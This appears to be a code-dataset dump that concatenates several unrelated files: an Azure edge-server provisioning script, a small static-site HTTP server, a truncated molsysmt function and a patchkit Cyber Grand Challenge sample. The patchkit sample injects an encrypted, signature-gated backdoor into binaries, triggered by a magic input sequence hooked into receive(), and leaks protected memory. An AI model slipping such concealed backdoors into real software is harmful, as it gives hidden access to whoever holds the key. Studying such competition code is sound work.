Excpeption: " + str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['shared_storage_account_name'] == storage_account.tags["Name"]: shared_storage_account_name = storage_account.name if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: user_storage_account_name = storage_account.name print('[SUMMARY]') logging.info('[SUMMARY]') print("Instance name: {}".format(edge_conf['instance_name'])) print("Hostname: {}".format(edge_conf['instance_dns_name'])) print("Public IP: {}".format(edge_conf['edge_public_ip'])) print("Private IP: {}".format(edge_conf['edge_private_ip'])) print("Key name: {}".format(edge_conf['key_name'])) print("User storage account name: 
{}".format(user_storage_account_name)) print("User container name: {}".format(edge_conf['user_container_name'])) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: datalake_id = datalake.name print("Data Lake name: {}".format(datalake_id)) print("Data Lake tag name: {}".format(edge_conf['datalake_store_name'])) print("Data Lake Store user directory name: {}".format(edge_conf['datalake_user_directory_name'])) print("Notebook SG: {}".format(edge_conf['notebook_security_group_name'])) print("Edge SG: {}".format(edge_conf['edge_security_group_name'])) print("Notebook subnet: {}".format(edge_conf['private_subnet_cidr'])) with open("/root/result.json", 'w') as result: if os.environ['azure_datalake_enable'] == 'false': res = {"hostname": edge_conf['instance_dns_name'], "public_ip": edge_conf['edge_public_ip'], "ip": edge_conf['edge_private_ip'], "key_name": edge_conf['key_name'], "user_storage_account_name": user_storage_account_name, "user_container_name": edge_conf['user_container_name'], "shared_storage_account_name": shared_storage_account_name, "shared_container_name": edge_conf['shared_container_name'], "user_storage_account_tag_name": edge_conf['user_storage_account_name'], "tunnel_port": "22", "socks_port": "1080", "notebook_sg": edge_conf['notebook_security_group_name'], "edge_sg": edge_conf['edge_security_group_name'], "notebook_subnet": edge_conf['private_subnet_cidr'], "instance_id": edge_conf['instance_name'], "full_edge_conf": edge_conf, "Action": "Create new EDGE server"} else: res = {"hostname": edge_conf['instance_dns_name'], "public_ip": edge_conf['edge_public_ip'], "ip": edge_conf['edge_private_ip'], "key_name": edge_conf['key_name'], "user_storage_account_name": user_storage_account_name, "user_container_name": edge_conf['user_container_name'], "shared_storage_account_name": shared_storage_account_name, 
"shared_container_name": edge_conf['shared_container_name'], "user_storage_account_tag_name": edge_conf['user_storage_account_name'], "datalake_name": datalake_id, "datalake_tag_name": edge_conf['datalake_store_name'], "datalake_shared_directory_name": edge_conf['datalake_shared_directory_name'], "datalake_user_directory_name": edge_conf['datalake_user_directory_name'], "tunnel_port": "22", "socks_port": "1080", "notebook_sg": edge_conf['notebook_security_group_name'], "edge_sg": edge_conf['edge_security_group_name'], "notebook_subnet": edge_conf['private_subnet_cidr'], "instance_id": edge_conf['instance_name'], "full_edge_conf": edge_conf, "Action": "Create new EDGE server"} print(json.dumps(res)) result.write(json.dumps(res)) except: print("Failed writing results.") sys.exit(0) sys.exit(0)
66.570492
131
0.625
#!/usr/bin/python # ***************************************************************************** # # Copyright (c) 2016, EPAM SYSTEMS INC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ****************************************************************************** import json from dlab.fab import * from dlab.meta_lib import * import sys, time, os from dlab.actions_lib import * if __name__ == "__main__": local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['edge_user_name'], os.environ['request_id']) local_log_filepath = "/logs/edge/" + local_log_filename logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s', level=logging.DEBUG, filename=local_log_filepath) try: print('Generating infrastructure names and tags') edge_conf = dict() edge_conf['service_base_name'] = os.environ['conf_service_base_name'] edge_conf['resource_group_name'] = os.environ['azure_resource_group_name'] edge_conf['key_name'] = os.environ['conf_key_name'] edge_conf['vpc_name'] = os.environ['azure_vpc_name'] edge_conf['region'] = os.environ['azure_region'] edge_conf['subnet_name'] = os.environ['azure_subnet_name'] edge_conf['user_name'] = os.environ['edge_user_name'].replace('_', '-') edge_conf['user_keyname'] = os.environ['edge_user_name'] edge_conf['private_subnet_name'] = edge_conf['service_base_name'] + '-' + edge_conf['user_name'] + '-subnet' edge_conf['instance_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge' 
edge_conf['network_interface_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge-nif' edge_conf['static_public_ip_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge-ip' edge_conf['primary_disk_name'] = edge_conf['instance_name'] + '-disk0' edge_conf['instance_dns_name'] = 'host-' + edge_conf['instance_name'] + '.' + edge_conf['region'] + '.cloudapp.azure.com' edge_conf['user_storage_account_name'] = edge_conf['service_base_name'] + '-' + edge_conf[ 'user_name'] + '-storage' edge_conf['user_container_name'] = (edge_conf['service_base_name'] + '-' + edge_conf['user_name'] + '-container').lower() edge_conf['shared_storage_account_name'] = edge_conf['service_base_name'] + '-shared-storage' edge_conf['shared_container_name'] = (edge_conf['service_base_name'] + '-shared-container').lower() edge_conf['datalake_store_name'] = edge_conf['service_base_name'] + '-ssn-datalake' edge_conf['datalake_shared_directory_name'] = edge_conf['service_base_name'] + '-shared-folder' edge_conf['datalake_user_directory_name'] = '{0}-{1}-folder'.format(edge_conf['service_base_name'], edge_conf['user_name']) edge_conf['edge_security_group_name'] = edge_conf['instance_name'] + '-sg' edge_conf['notebook_security_group_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + \ '-nb-sg' edge_conf['master_security_group_name'] = edge_conf['service_base_name'] + '-' \ + edge_conf['user_name'] + '-dataengine-master-sg' edge_conf['slave_security_group_name'] = edge_conf['service_base_name'] + '-' \ + edge_conf['user_name'] + '-dataengine-slave-sg' edge_conf['dlab_ssh_user'] = os.environ['conf_os_user'] keyfile_name = "{}{}.pem".format(os.environ['conf_key_dir'], edge_conf['key_name']) edge_conf['private_subnet_cidr'] = AzureMeta().get_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']).address_prefix edge_conf['edge_public_ip'] = 
AzureMeta().get_instance_public_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) edge_conf['edge_private_ip'] = AzureMeta().get_private_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) instance_hostname = AzureMeta().get_private_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) except Exception as err: append_result("Failed to generate infrastructure names", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: if os.environ['conf_os_family'] == 'debian': initial_user = 'ubuntu' sudo_group = 'sudo' if os.environ['conf_os_family'] == 'redhat': initial_user = 'ec2-user' sudo_group = 'wheel' logging.info('[CREATING DLAB SSH USER]') print('[CREATING DLAB SSH USER]') params = "--hostname {} --keyfile {} --initial_user {} --os_user {} 
--sudo_group {}".format\ (instance_hostname, os.environ['conf_key_dir'] + os.environ['conf_key_name'] + ".pem", initial_user, edge_conf['dlab_ssh_user'], sudo_group) try: local("~/scripts/{}.py {}".format('create_ssh_user', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed creating ssh user 'dlab'.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING PREREQUISITES]') logging.info('[INSTALLING PREREQUISITES]') params = "--hostname {} --keyfile {} --user {} --region {}".\ format(instance_hostname, keyfile_name, edge_conf['dlab_ssh_user'], os.environ['azure_region']) try: local("~/scripts/{}.py {}".format('install_prerequisites', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed 
installing apps: apt & pip.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING HTTP PROXY]') logging.info('[INSTALLING HTTP PROXY]') additional_config = {"exploratory_subnet": edge_conf['private_subnet_cidr'], "template_file": "/root/templates/squid.conf"} params = "--hostname {} --keyfile {} --additional_config '{}' --user {}" \ .format(instance_hostname, keyfile_name, json.dumps(additional_config), edge_conf['dlab_ssh_user']) try: local("~/scripts/{}.py {}".format('configure_http_proxy', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed installing http proxy.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], 
edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING USERs KEY]') logging.info('[INSTALLING USERs KEY]') additional_config = {"user_keyname": edge_conf['user_keyname'], "user_keydir": os.environ['conf_key_dir']} params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format( instance_hostname, keyfile_name, json.dumps(additional_config), edge_conf['dlab_ssh_user']) try: local("~/scripts/{}.py {}".format('install_user_key', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed installing users key. 
Excpeption: " + str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['shared_storage_account_name'] == storage_account.tags["Name"]: shared_storage_account_name = storage_account.name if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: user_storage_account_name = storage_account.name print('[SUMMARY]') logging.info('[SUMMARY]') print("Instance name: {}".format(edge_conf['instance_name'])) print("Hostname: {}".format(edge_conf['instance_dns_name'])) print("Public IP: {}".format(edge_conf['edge_public_ip'])) print("Private IP: {}".format(edge_conf['edge_private_ip'])) print("Key name: {}".format(edge_conf['key_name'])) print("User storage account name: 
{}".format(user_storage_account_name)) print("User container name: {}".format(edge_conf['user_container_name'])) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: datalake_id = datalake.name print("Data Lake name: {}".format(datalake_id)) print("Data Lake tag name: {}".format(edge_conf['datalake_store_name'])) print("Data Lake Store user directory name: {}".format(edge_conf['datalake_user_directory_name'])) print("Notebook SG: {}".format(edge_conf['notebook_security_group_name'])) print("Edge SG: {}".format(edge_conf['edge_security_group_name'])) print("Notebook subnet: {}".format(edge_conf['private_subnet_cidr'])) with open("/root/result.json", 'w') as result: if os.environ['azure_datalake_enable'] == 'false': res = {"hostname": edge_conf['instance_dns_name'], "public_ip": edge_conf['edge_public_ip'], "ip": edge_conf['edge_private_ip'], "key_name": edge_conf['key_name'], "user_storage_account_name": user_storage_account_name, "user_container_name": edge_conf['user_container_name'], "shared_storage_account_name": shared_storage_account_name, "shared_container_name": edge_conf['shared_container_name'], "user_storage_account_tag_name": edge_conf['user_storage_account_name'], "tunnel_port": "22", "socks_port": "1080", "notebook_sg": edge_conf['notebook_security_group_name'], "edge_sg": edge_conf['edge_security_group_name'], "notebook_subnet": edge_conf['private_subnet_cidr'], "instance_id": edge_conf['instance_name'], "full_edge_conf": edge_conf, "Action": "Create new EDGE server"} else: res = {"hostname": edge_conf['instance_dns_name'], "public_ip": edge_conf['edge_public_ip'], "ip": edge_conf['edge_private_ip'], "key_name": edge_conf['key_name'], "user_storage_account_name": user_storage_account_name, "user_container_name": edge_conf['user_container_name'], "shared_storage_account_name": shared_storage_account_name, 
"shared_container_name": edge_conf['shared_container_name'], "user_storage_account_tag_name": edge_conf['user_storage_account_name'], "datalake_name": datalake_id, "datalake_tag_name": edge_conf['datalake_store_name'], "datalake_shared_directory_name": edge_conf['datalake_shared_directory_name'], "datalake_user_directory_name": edge_conf['datalake_user_directory_name'], "tunnel_port": "22", "socks_port": "1080", "notebook_sg": edge_conf['notebook_security_group_name'], "edge_sg": edge_conf['edge_security_group_name'], "notebook_subnet": edge_conf['private_subnet_cidr'], "instance_id": edge_conf['instance_name'], "full_edge_conf": edge_conf, "Action": "Create new EDGE server"} print(json.dumps(res)) result.write(json.dumps(res)) except: print("Failed writing results.") sys.exit(0) sys.exit(0)
0
0
0
0360b4a0c14622785e2c5d98e3fb589264013d5d
5,846
py
Python
samples/cgc/backdoor/01_nacl.py
EarthCompass/patchkit
7d3dd1f6ad410a1bb975b544ccb666c859ec2448
[ "MIT" ]
631
2016-08-08T01:44:40.000Z
2022-03-18T17:38:13.000Z
samples/cgc/backdoor/01_nacl.py
EarthCompass/patchkit
7d3dd1f6ad410a1bb975b544ccb666c859ec2448
[ "MIT" ]
32
2016-08-08T01:58:09.000Z
2021-06-17T11:06:51.000Z
samples/cgc/backdoor/01_nacl.py
EarthCompass/patchkit
7d3dd1f6ad410a1bb975b544ccb666c859ec2448
[ "MIT" ]
94
2016-08-08T05:10:06.000Z
2021-06-17T04:55:06.000Z
import os import sys from util import read from util.crypto.rc4 import rc4 from util.patch.syscall import find_syscall_funcs
33.988372
108
0.522237
# NOTE(review): this dataset cell's original newlines were collapsed to spaces
# by the export; the code below is re-flowed at Python statement boundaries
# only. The embedded C snippets are reproduced exactly as they appear (one
# line each) so no runtime string bytes change.
import os
import sys

from util import read
from util.crypto.rc4 import rc4
from util.patch.syscall import find_syscall_funcs  # NOTE(review): imported but unused in this cell


def backdoor(pt):
    """Inject a signature-gated, RC4-encrypted backdoor into the patched binary.

    The backdoor (TweetNaCl + an embedded public key + a handshake) is
    compiled in, then RC4-encrypted and relocated to an NX page so its bytes
    do not contribute usable ROP gadgets. The binary's receive() is wrapped
    so a magic input sequence decrypts and runs the backdoor.

    pt: patcher context (provides inject/patch, elf reader, linker hooks).
    """
    # Build the backdoor's C source: TweetNaCl, its header, the public key,
    # the handshake entry point, and an RNG shim.
    c = read('backdoor/tweetnacl.c')
    c = c.replace('#include "tweetnacl.h"', '')
    h = read('backdoor/tweetnacl.h')
    pubkey = read('backdoor/pubkey.h')
    # randombytes() is the RNG hook TweetNaCl expects, backed by SYS_random.
    randombytes = r''' void randombytes(uint8_t *msg, uint64_t len) { syscall3(SYS_random, (uint32_t)msg, len, 0); } '''
    # TODO: transmit_all / receive_all?
    # handshake(): send a random nonce, require it back signed by the private
    # key, and on success transmit 4 bytes from 0x4347c000 (the "type 2 POV"
    # target page referenced in the comment below). Always terminates.
    code = r''' #define NONCE_LEN 8 #define SM_LEN 0x48 void handshake() { uint8_t nonce[NONCE_LEN]; syscall3(SYS_random, (uint32_t)nonce, NONCE_LEN, 0); syscall4(SYS_transmit, 1, (uint32_t)nonce, NONCE_LEN, 0); uint32_t smlen = SM_LEN; uint8_t *sm, *m; if (syscall3(SYS_allocate, smlen, 0, (uint32_t)&sm) || (syscall3(SYS_allocate, smlen, 0, (uint32_t)&m))) { _terminate(1); } syscall4(SYS_receive, 0, (uint32_t)sm, smlen, 0); uint64_t mlen; int valid = crypto_sign_open(m, &mlen, sm, smlen, pubkey); if (valid == 0 && memcmp(m, nonce, NONCE_LEN) == 0) { syscall4(SYS_transmit, 1, 0x4347c000, 4, 0); } syscall1(SYS__terminate, 2); } '''
    code = h + pubkey + code + randombytes + c
    backdoor_addr, size = pt.inject(c=code, size=True)
    # rc4-encrypt the backdoor so you can't ROP directly into the type2 pov
    # this block also intercepts the receive() syscall function
    rc4_key = os.urandom(16)
    # as part of rc4-encrypting, we relocate the backdoor to the NX page so it doesn't add 1000+ ROP gadgets
    xor = rc4(rc4_key)
    data = pt.elf.read(backdoor_addr, size)
    # Python 2 idioms here (xrange, generator .next()); rc4() yields a
    # keystream byte per call. The executable copy is then zeroed and the
    # ciphertext stashed on the NX page.
    for i in xrange(len(data)):
        data[i] ^= xor.next()
    shadow_addr = pt.inject(raw=data, target='nx', silent=True)
    pt.patch(backdoor_addr, raw=size * '\x00', silent=True)
    # xor key so they can't just pull it out of memory
    key_otp = os.urandom(len(rc4_key))
    key = ''.join([chr(ord(c) ^ ord(key_otp[i])) for i, c in enumerate(rc4_key)])
    # Render a byte string as a C array initializer list, e.g. "65, 66, 67".
    str2c = lambda x: ', '.join(map(str, map(ord, x)))
    # call_backdoor(): copy the ciphertext back over the executable slot,
    # rebuild the RC4 key from key ^ otp, decrypt in place, and jump to it.
    call_backdoor = r''' void call_backdoor() { void (*backdoor)() = (void (*)())%d; char *shadow_addr = (char *)%d; size_t bd_size = %d; memcpy(backdoor, shadow_addr, bd_size); uint8_t state[256]; uint8_t rc4_key[] = {%s}; uint8_t rc4_otp[] = {%s}; int keylen = %d; for (int i = 0; i < keylen; i++) { rc4_key[i] ^= rc4_otp[i]; } ksa(state, rc4_key, keylen); rc4(state, (uint8_t *)backdoor, bd_size); backdoor(); // always exit after backdoor so there's not a decrypted type 2 POV in memory you can ROP into _terminate(0); } ''' % (backdoor_addr, shadow_addr, size, str2c(key), str2c(key_otp), len(key))
    # Replacement receive(): on the first read from fd 0, buffer up to WINDOW
    # bytes and pass them to check_init() to look for the trigger sequence;
    # afterwards drain the buffer before delegating to the real _receive().
    receive_hook_head = r''' void call_backdoor(); void check_init(char *buf, uint32_t size); int _receive(int fd, void *buf, uint32_t size, uint32_t *count); #define WINDOW 9 char bufsave[WINDOW] = {1}; uint32_t first = 1, saved = 1, pos = 1; int receive(int fd, void *_buf, uint32_t size, uint32_t *count) { char *buf = (char *)_buf; // shortcut if we've run and buffer is empty, or on fd > 0 if (fd != 0 || saved == 0) { return _receive(fd, buf, size, count); } else if (first) { first = 0; if (size < WINDOW) { int ret = _receive(fd, bufsave, WINDOW, &saved); if (ret) return ret; check_init(bufsave, saved); pos = 0; } else { int ret = _receive(fd, buf, size, &saved); if (ret) return ret; if (count) *count = saved; check_init(buf, saved); saved = 0; return ret; } } // flush buffer if (saved > 0 && saved < size) { memcpy(buf, bufsave + pos, saved); if (count) *count = saved; uint32_t tmp; int ret = _receive(fd, buf + saved, size - saved, &tmp); saved = 0; if (ret) return ret; if (count) *count += tmp; return ret; } else if (saved >= size) { memcpy(buf, bufsave + pos, size); if (count) *count = size; saved -= size; pos += size; } return 0; }'''
    # check_init(): rolling 4-byte XOR over the input; when it matches "ECAF",
    # echo the bytes inverted (so the PoV can resynchronize) and enter the
    # backdoor via call_backdoor().
    receive_hook_tail = r''' void check_init(char *buf, uint32_t size) { if (size < 5) return; char hash[4]; for (int i = 0; i < 4; i++) hash[i] = buf[i]; char *key = "ECAF"; for (int i = 4; i < size; i++) { for (int j = 0; j < 4; j++) { hash[j] ^= buf[i]; } if (*(uint32_t *)hash == *(uint32_t *)key) { size = i + 1; // respond with inverted key so POV can seek ahead to handshake for (int j = 0; j < size; j++) { buf[j] ^= 0xff; } transmit(1, buf, size, 0); call_backdoor(); } } } ''' + call_backdoor

    # Linker pre-hook: when the unit defining receive() is compiled, rename it
    # to _receive() and splice the hooked wrapper around it.
    def patch_receive(code, syms):
        if syms == ['receive']:
            out = []
            # TODO: this is really gross text parsing
            out.append(receive_hook_head)
            for line in code.split('\n'):
                if line.startswith('int receive(') and line.endswith('{'):
                    out.append(line.replace('int receive(', 'int _receive(', 1))
                else:
                    out.append(line)
            out.append(receive_hook_tail)
            return '\n'.join(out)

    pt.binary.linker.onpre(patch_receive)
5,697
0
23
72a8d7b86cb93e472da4a88ffcffd54c32dd8924
2,209
py
Python
pynfact/server.py
jacorbal/pynfact
3dc512ef7209b596353060616c0df2abe19a638f
[ "MIT" ]
null
null
null
pynfact/server.py
jacorbal/pynfact
3dc512ef7209b596353060616c0df2abe19a638f
[ "MIT" ]
null
null
null
pynfact/server.py
jacorbal/pynfact
3dc512ef7209b596353060616c0df2abe19a638f
[ "MIT" ]
null
null
null
# vim: set ft=python fileencoding=utf-8 tw=72 fdm=indent foldlevel=1 nowrap:
"""
Simple server for testing purposes.

:copyright: © 2012-2020, J. A. Corbal
:license: MIT
"""
import os
import sys

from http.server import HTTPServer, SimpleHTTPRequestHandler


class Server:
    """Minimal HTTP server that previews the generated static site.

    .. versionchanged:: 1.2.0a1
        Implement ``logging`` instead of printing to ``stdout`` and/or
        ``stderr``.
    """

    def __init__(self, host='127.0.0.1', port=4000, path='_build',
                 logger=None):
        """Store the serving configuration.

        :param host: Address where the server will be listening
        :type host: str
        :param port: Port where the server will be listening
        :type port: str
        :param path: Where the static website will be generated
        :type path: str
        :param logger: Logger where to store activity in
        :type logger: logging.Logger
        """
        self.host = host
        self.port = port
        self.path = path
        self.logger = logger

    def serve(self):
        """Serve the deploy directory until a keyboard interrupt arrives.

        Exits the process with code 61 when the deploy directory is
        missing, and 62 when the address/port cannot be bound.

        :raise FileNotFoundError: If the deploy directory doesn't exist
        :raise KeyboardInterrupt: If the user stops the server (``^C``)
        :raise OSError: If ``location:port`` is not valid or in use
        """
        # Move into the deploy directory so relative paths resolve there.
        try:
            os.chdir(self.path)
        except FileNotFoundError:
            if self.logger:
                self.logger.error("Deploy directory not found")
            sys.exit(61)

        # Bind the listening socket.
        try:
            httpd = HTTPServer((self.host, self.port),
                               SimpleHTTPRequestHandler)
        except OSError:
            if self.logger:
                self.logger.error("Address not valid or already in use")
            sys.exit(62)

        if self.logger:
            self.logger.info(
                "Serving {}:{} at {}".format(self.host, self.port,
                                             self.path))

        # Block until the user interrupts with ^C.
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            if self.logger:
                self.logger.info("Interrupted!")
32.014493
76
0.586238
# vim: set ft=python fileencoding=utf-8 tw=72 fdm=indent foldlevel=1 nowrap: """ Simple server for testing purposes. :copyright: © 2012-2020, J. A. Corbal :license: MIT """ import os import sys from http.server import HTTPServer, SimpleHTTPRequestHandler class Server: """Simple server. .. versionchanged:: 1.2.0a1 Implement ``logging`` instead of printing to ``stdout`` and/or ``stderr``. """ def __init__(self, host='127.0.0.1', port=4000, path='_build', logger=None): """Constructor. :param host: Addres where the server will be listening :type host: str :param port: Port where the server will be listening :type port: str :param path: Where the static website will be generated :type path: str :param logger: Logger where to store activity in :type logger: logging.Logger """ self.port = port self.host = host self.path = path self.logger = logger def serve(self): """Serve a specific directory and waits for keyboard interrupt. :raise FileNotFoundError: If the deploy directory doesn't exist :raise KeyboardInterrupt: If the user stops the server (``^C``) :raise OSError: If ``location:port`` is not valid or in use """ try: # Find the deploy directory os.chdir(self.path) except FileNotFoundError: self.logger and self.logger.error( "Deploy directory not found") sys.exit(61) try: # Initialize the server httpd = HTTPServer((self.host, self.port), SimpleHTTPRequestHandler) except OSError: self.logger and self.logger.error( "Address not valid or already in use") sys.exit(62) self.logger and self.logger.info( "Serving {}:{} at {}".format(self.host, self.port, self.path)) try: # Listen until a keyboard interruption httpd.serve_forever() except KeyboardInterrupt: self.logger and self.logger.info("Interrupted!")
0
0
0
68dd208ec7d8ba0ae708db0beebd344158030e83
691
py
Python
molsysmt/basic/has_attribute.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
molsysmt/basic/has_attribute.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
molsysmt/basic/has_attribute.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
from molsysmt._private.exceptions import * from molsysmt._private.digestion import * from molsysmt._private.lists_and_tuples import is_list_or_tuple
25.592593
79
0.738061
from molsysmt._private.exceptions import *
from molsysmt._private.digestion import *
from molsysmt._private.lists_and_tuples import is_list_or_tuple


def has_attribute(molecular_system, attribute, check=True):
    """Return True when `attribute` is found in the molecular system.

    Parameters
    ----------
    molecular_system : molecular system
        Molecular system to inspect (any form accepted by MolSysMT).
    attribute : str
        Name of the attribute to look for.
    check : bool, default True
        If True, validate both inputs before searching.

    Returns
    -------
    bool
        True when `where_is_attribute` locates an item carrying the
        attribute, False otherwise.

    Raises
    ------
    WrongItemError
        If `molecular_system` is not a valid molecular system (check=True).
    WrongAttributeError
        If `attribute` is not a recognized attribute name (check=True).
    """
    # Local imports avoid a circular dependency with the `basic` package.
    from . import where_is_attribute, is_molecular_system
    from molsysmt.tools.attribute import is_attribute

    if check:
        # BUG FIX: the original referenced an undefined name `item` here and
        # in the where_is_attribute call; the parameter is `molecular_system`.
        if not is_molecular_system(molecular_system):
            # NOTE(review): the error is built from `attribute` as in the
            # original; passing `molecular_system` may be intended -- confirm.
